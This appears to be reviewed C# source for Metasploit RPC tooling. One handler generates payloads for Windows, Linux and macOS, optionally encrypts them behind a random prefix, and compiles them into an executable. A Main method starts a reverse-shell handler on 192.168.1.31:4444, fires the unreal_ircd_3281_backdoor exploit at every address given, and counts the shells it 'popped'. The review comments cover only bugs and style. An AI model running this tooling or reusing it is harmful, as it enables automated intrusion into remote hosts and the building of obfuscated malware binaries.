    /// <summary>
    /// Button click handler. Loads one of two embedded C# source templates, fills the
    /// <c>{{lin64}}</c>, <c>{{lin86}}</c>, <c>{{win64}}</c>, <c>{{win86}}</c> (and, on the
    /// encrypted path, <c>{{parity}}</c>) placeholders with byte-array literals built from the
    /// output of <c>_manager.ExecuteModule("payload", ...)</c> for every entry in
    /// <c>_newPayloads</c>, writes the filled template to the temp directory and runs
    /// <c>gmcs</c> on it. Every outcome is reported to the user through a GTK
    /// <c>MessageDialog</c>; nothing is returned.
    /// </summary>
    /// <param name="sender">Unused.</param>
    /// <param name="e">Unused.</param>
    void HandleClicked(object sender, EventArgs e)
    {
        string   template = string.Empty;
        Assembly asm      = Assembly.GetExecutingAssembly();

        // _encrypted is a toggle widget (presumably a CheckButton); its state selects the template.
        string rsrc = _encrypted.Active ? "MetasploitPayloadUtility.EncryptedTemplate.txt" : "MetasploitPayloadUtility.GeneralTemplate.txt";

        // NOTE(review): this sits outside the try below. If the resource is not embedded,
        // GetManifestResourceStream returns null and the StreamReader constructor throws
        // ArgumentNullException, which propagates out of the handler unhandled.
        using (StreamReader rdr = new StreamReader(asm.GetManifestResourceStream(rsrc)))
            template = rdr.ReadToEnd();

        // All four accumulators start as the same opening of a C# jagged-array literal and are
        // closed with "};" below; one element is appended per matching payload.
        string winx64Payload = "payload = new byte[][] {";
        string winx86Payload = winx64Payload;
        string linx86Payload = winx86Payload;
        string linx64Payload = linx86Payload;

        MessageDialog md;

        try {
            if (!_encrypted.Active)
            {
                foreach (var pair in _newPayloads)
                {
                    // pair.Value is mutated in place: the caller's option dictionary now carries Format.
                    pair.Value ["Format"] = "csharp";
                    var response = _manager.ExecuteModule("payload", pair.Key, pair.Value);

                    // NOTE(review): an error reply is detected purely by the dictionary having six
                    // entries — presumably the shape of the RPC error object; a success reply with
                    // six keys would be misreported, and a malformed error would fall through. Confirm.
                    if (response.Count == 6)
                    {
                        md = new MessageDialog(this,
                                               DialogFlags.DestroyWithParent,
                                               MessageType.Warning,
                                               ButtonsType.Close, "Generating payload failed.\n\n" + response["error_message"]);

                        md.Run();
                        md.Destroy();
                        return;
                    }

                    // NOTE(review): StartsWith without a StringComparison is culture-sensitive;
                    // StringComparison.Ordinal is the usual choice for module-name keys.
                    if (pair.Key.StartsWith("linux/x86") || pair.Key.StartsWith("osx/x86"))
                    {
                        // Keeps the text after the first '=' of the "csharp"-format output and turns
                        // its terminating ';' into a ',' so it becomes one element of the jagged array.
                        // A non-string "payload" value (null after 'as') or output without '=' throws
                        // here and lands in the catch-all below.
                        linx86Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
                    }
                    else if (pair.Key.StartsWith("linux/x64") || pair.Key.StartsWith("osx/x64"))
                    {
                        linx64Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
                    }
                    else if (pair.Key.StartsWith("windows/x64"))
                    {
                        winx64Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
                    }
                    else                         /*windows x86*/
                    {
                        // Anything not matched above (not only windows/x86) ends up in this bucket.
                        winx86Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
                    }
                }

                winx64Payload += "};";
                winx86Payload += "};";
                linx64Payload += "};";
                linx86Payload += "};";

                //Console.WriteLine (winx64Payload);
                //Console.WriteLine (winx86Payload);
                //Console.WriteLine (linx64Payload);
                //Console.WriteLine (linx86Payload);
            }
            else
            {
                // Four bytes, each in 65..90 ('A'..'Z'), prepended to every payload and also
                // emitted into the template as {{parity}}.
                // NOTE(review): _random's type is not visible here; if it is System.Random the
                // values are not suitable for anything that must be unpredictable.
                byte[] parity = new byte[4];
                for (int i = 0; i < 4; i++)
                {
                    parity [i] = Convert.ToByte(Convert.ToInt32(Math.Floor(26 * _random.NextDouble() + 65)));
                }

                foreach (var pair in _newPayloads)
                {
                    pair.Value ["Format"] = "raw";
                    var response = _manager.ExecuteModule("payload", pair.Key, pair.Value);

                    // Same six-entry error heuristic as on the unencrypted path.
                    if (response.Count == 6)
                    {
                        md = new MessageDialog(this,
                                               DialogFlags.DestroyWithParent,
                                               MessageType.Warning,
                                               ButtonsType.Close, "Generating payload failed.\n\n" + response["error_message"]);

                        md.Run();
                        md.Destroy();
                        return;
                    }

                    if (pair.Key.StartsWith("linux/x86") || pair.Key.StartsWith("osx/x86"))
                    {
                        // 'as byte[]' yields null for any other value type; b.Length then throws
                        // into the catch-all below.
                        byte[] b    = response ["payload"] as byte[];
                        byte[] encb = new byte[b.Length + 4];
                        encb [0] = parity [0];
                        encb [1] = parity [1];
                        encb [2] = parity [2];
                        encb [3] = parity [3];

                        // NOTE(review): the bound is b.Length although encb has b.Length + 4 slots,
                        // so only b[0 .. b.Length-5] is copied: encb's last four bytes stay zero and
                        // b's last four bytes are never copied. Looks unintended — confirm against
                        // what EncryptData and the template expect. The same loop is repeated in the
                        // three branches below.
                        for (int i = 4; i < b.Length; i++)
                        {
                            encb [i] = b [i - 4];
                        }

                        // Key is the decimal string of a value in [0, 1023) drawn per payload —
                        // TODO confirm what EncryptData expects; only 1023 distinct keys are possible.
                        linx86Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
                    }
                    else if (pair.Key.StartsWith("linux/x64") || pair.Key.StartsWith("osx/x64"))
                    {
                        // Same prefix-and-copy as the linux/x86 branch (same loop bound).
                        byte[] b    = response ["payload"] as byte[];
                        byte[] encb = new byte[b.Length + 4];
                        encb [0] = parity [0];
                        encb [1] = parity [1];
                        encb [2] = parity [2];
                        encb [3] = parity [3];

                        for (int i = 4; i < b.Length; i++)
                        {
                            encb [i] = b [i - 4];
                        }
                        linx64Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
                    }
                    else if (pair.Key.StartsWith("windows/x64"))
                    {
                        // Same prefix-and-copy as the linux/x86 branch (same loop bound).
                        byte[] b    = response ["payload"] as byte[];
                        byte[] encb = new byte[b.Length + 4];
                        encb [0] = parity [0];
                        encb [1] = parity [1];
                        encb [2] = parity [2];
                        encb [3] = parity [3];

                        for (int i = 4; i < b.Length; i++)
                        {
                            encb [i] = b [i - 4];
                        }
                        winx64Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
                    }
                    else                         /*windows x86*/
                    {
                        // Catch-all bucket, as on the unencrypted path; same loop bound as above.
                        byte[] b    = response ["payload"] as byte[];
                        byte[] encb = new byte[b.Length + 4];
                        encb [0] = parity [0];
                        encb [1] = parity [1];
                        encb [2] = parity [2];
                        encb [3] = parity [3];

                        for (int i = 4; i < b.Length; i++)
                        {
                            encb [i] = b [i - 4];
                        }
                        winx86Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
                    }
                }

                winx64Payload += "};";
                winx86Payload += "};";
                linx64Payload += "};";
                linx86Payload += "};";

                //Console.WriteLine (winx64Payload);
                //Console.WriteLine (winx86Payload);
                //Console.WriteLine (linx64Payload);
                //Console.WriteLine (linx86Payload);


                // Drops the final character of GetByteArrayString's output — presumably a trailing
                // separator; verify against that helper. Throws if the string is empty.
                string par = GetByteArrayString(parity);

                template = template.Replace("{{parity}}", par.Remove(par.Length - 1));
            }
        } catch {
            // NOTE(review): catches everything (including the null/Split/Length failures noted
            // above) and shows a dialog, but does not return: execution continues below and a
            // template with half-filled array literals is still written and handed to gmcs.
            md = new MessageDialog(this,
                                   DialogFlags.DestroyWithParent,
                                   MessageType.Warning,
                                   ButtonsType.Close, "Generating payload failed.\n\nPlease ensure all required (*) options are present and valid.\n\nIf you are sure options are correct, please file a bug.");

            md.Run();
            md.Destroy();
        }

        // Placeholders not present in the chosen template are simply left untouched.
        template = template.Replace("{{lin64}}", linx64Payload);
        template = template.Replace("{{lin86}}", linx86Payload);
        template = template.Replace("{{win64}}", winx64Payload);
        template = template.Replace("{{win86}}", winx86Payload);

        Guid uid = Guid.NewGuid();

        // Source is written with no extension directly under the temp directory (shared and
        // often world-readable on multi-user hosts); neither it nor the compiled output is
        // removed by this method.
        File.WriteAllText(System.IO.Path.GetTempPath() + uid.ToString(), template);

        System.Diagnostics.Process          process   = new System.Diagnostics.Process();
        System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();

        // NOTE(review): the path is passed unquoted as the whole argument string; a temp path
        // containing spaces would be split into several arguments. gmcs must be on PATH.
        startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
        startInfo.FileName    = "gmcs";
        startInfo.Arguments   = System.IO.Path.GetTempPath() + uid.ToString();

        process.StartInfo = startInfo;
        process.Start();

        // Blocks the UI thread until the compiler exits; process.ExitCode is never inspected.
        process.WaitForExit();

        // Shown unconditionally — also when compilation failed. The ".exe" name relies on the
        // compiler's default output naming (source name plus .exe); confirm for gmcs.
        md = new MessageDialog(this,
                               DialogFlags.DestroyWithParent,
                               MessageType.Warning,
                               ButtonsType.Close, "Your binary is located at: " + System.IO.Path.GetTempPath() + uid.ToString() + ".exe");

        md.Run();
        md.Destroy();
    }
        /// <summary>
        /// Entry point. Opens a <c>MetasploitSession</c> against a hard-coded local RPC endpoint
        /// with hard-coded credentials, starts a <c>multi/handler</c> job, runs the
        /// <c>unix/irc/unreal_ircd_3281_backdoor</c> module once per address in
        /// <paramref name="args"/>, polls the job list until no job with that exploit name is
        /// listed, stops the handler job and prints the number of sessions reported by
        /// <c>ListSessions</c>.
        /// </summary>
        /// <param name="args">One RHOST value per argument; no validation is performed.</param>
        /// <exception cref="Exception">Thrown when the session has no token (login failed).
        /// NOTE(review): a more specific type (e.g. InvalidOperationException) would be idiomatic.</exception>
        public static void Main(string[] args)
        {
            // NOTE(review): credentials and endpoint are embedded in source; read them from
            // configuration or the environment instead.
            using (MetasploitSession session = new MetasploitSession("user", "pass", "http://127.0.0.1:55553/api")) {
                if (string.IsNullOrEmpty(session.Token))
                {
                    throw new Exception("Login failed. Check credentials");
                }

                using (MetasploitManager manager = new MetasploitManager(session)) {
                    Dictionary <string, object> response = null;

                    // Handler options; all values are passed as strings.
                    Dictionary <string, object> blah = new Dictionary <string, object> ();
                    blah ["ExitOnSession"] = "false";
                    blah ["PAYLOAD"]       = "cmd/unix/reverse";
                    blah ["LHOST"]         = "192.168.1.31";
                    blah ["LPORT"]         = "4444";

                    response = manager.ExecuteModule("exploit", "multi/handler", blah);
                    // NOTE(review): the indexer throws KeyNotFoundException if the reply has no
                    // "job_id" (e.g. an error reply); a null value would surface later at ToString().
                    object jobID = response ["job_id"];

                    foreach (string ip in args)
                    {
                        Dictionary <string, object> opts = new Dictionary <string, object> ();
                        opts ["RHOST"] = ip;
                        opts ["DisablePayloadHandler"] = "true";
                        opts ["LHOST"]   = "192.168.1.31";
                        opts ["LPORT"]   = "4444";
                        opts ["PAYLOAD"] = "cmd/unix/reverse";

                        // The reply is overwritten on every iteration and never inspected, so a
                        // per-host error from the RPC is silently lost.
                        response = manager.ExecuteModule("exploit", "unix/irc/unreal_ircd_3281_backdoor", opts);
                    }

                    // Busy-wait: re-list jobs every six seconds while any job value equals the
                    // exploit's display name. There is no timeout, so a stuck job blocks forever.
                    response = manager.ListJobs();
                    List <object> vals = new List <object>(response.Values);
                    while (vals.Contains((object)"Exploit: unix/irc/unreal_ircd_3281_backdoor"))
                    {
                        Console.WriteLine("Waiting");
                        System.Threading.Thread.Sleep(6000);
                        response = manager.ListJobs();
                        vals     = new List <object> (response.Values);
                    }


                    response = manager.StopJob(jobID.ToString());
                    response = manager.ListSessions();

                    // response.Count is the number of entries in the sessions reply, not a verified
                    // count of live shells.
                    Console.WriteLine("I popped " + response.Count + " shells. Awesome.");

//					foreach (var pair in response) {
//						string id = pair.Key;
//						Dictionary<string, object> dict = (Dictionary<string, object>)pair.Value;
//						if ((dict["type"] as string) == "shell") {
//							response = manager.WriteToSessionShell(id, "id\n");
//							System.Threading.Thread.Sleep(6000);
//							response = manager.ReadSessionShell(id);
//
//							Console.WriteLine(response["data"]);
//
//							//manager.StopSession(id);
//						}
//					}

                    // NOTE(review): 'bl' is assigned but never read, and the following line is a
                    // leftover debug print; both look like dead code.
                    Dictionary <string, object> bl = manager.GetModuleCompatibleSessions("multi/general/execute");
                    Console.WriteLine("fdsa");
                }
            }
        }